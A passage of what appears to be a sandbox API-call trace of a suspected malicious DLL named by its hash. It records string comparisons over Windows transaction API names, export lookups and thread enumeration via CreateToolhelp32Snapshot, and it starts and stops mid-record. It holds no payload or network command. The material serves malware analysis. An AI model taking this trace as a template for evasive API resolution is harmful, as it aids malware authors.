lpString2="CreateEnlistment") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0170.226] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0170.226] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0170.226] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0170.226] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0170.226] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0170.226] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0170.226] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0170.226] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0170.226] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0170.226] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0170.226] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0170.226] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0170.226] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0170.226] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0170.226] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0170.226] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0170.226] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0170.226] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0170.226] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.226] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0170.226] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0170.226] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0170.226] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0170.226] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0170.227] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0170.227] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0170.227] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0170.227] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0170.227] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.227] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0170.227] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0170.227] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0170.227] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0170.227] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0170.227] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0170.227] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0170.227] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0170.227] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0170.227] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0170.227] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0170.228] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0170.228] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0170.229] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0170.229] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.229] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0170.229] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0170.229] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0170.229] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0170.229] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0170.229] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0170.229] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0170.229] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0170.229] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0170.229] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0170.229] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0170.230] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0170.230] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0170.230] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0170.230] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0170.230] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0170.230] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0170.230] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0170.230] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0170.230] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0170.230] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.230] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0170.231] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0170.232] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0170.232] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0170.232] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0170.232] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0170.232] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0170.232] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0170.232] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0170.232] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0170.232] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0170.232] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0170.232] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0170.232] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0170.351] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0170.351] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0170.351] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0170.351] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0170.351] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0170.351] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0170.351] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0170.352] GetProcessHeap () returned 0x450000 [0170.352] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x450000) returned 1 [0170.362] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0170.363] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0170.363] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1000) returned 0x2d45030 [0170.365] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2a) returned 0x468310 [0170.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_decode_tile_data", cchWideChar=-1, lpMultiByteStr=0x468310, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_decode_tile_data", lpUsedDefaultChar=0x0) returned 21 [0170.365] GetLastError () returned 0x0 [0170.365] SetLastError (dwErrCode=0x0) [0170.365] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_decode_tile_dataW") returned 0x0 [0170.365] GetLastError () returned 0x7f [0170.365] SetLastError (dwErrCode=0x7f) [0170.365] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_decode_tile_dataA") returned 0x0 [0170.365] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_decode_tile_data") returned 0x7ffc45f1a170 [0170.365] GetActiveWindow () returned 0x0 [0170.366] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x450000) returned 1 [0170.366] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468310 | out: hHeap=0x450000) returned 1 [0170.366] GetCurrentProcessId () returned 0x1254 [0170.366] GetCurrentThreadId () returned 0xa08 [0170.366] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0170.382] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.383] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.384] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.384] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.385] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.385] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.538] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.540] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.851] Thread32Next (hSnapshot=0x17c, 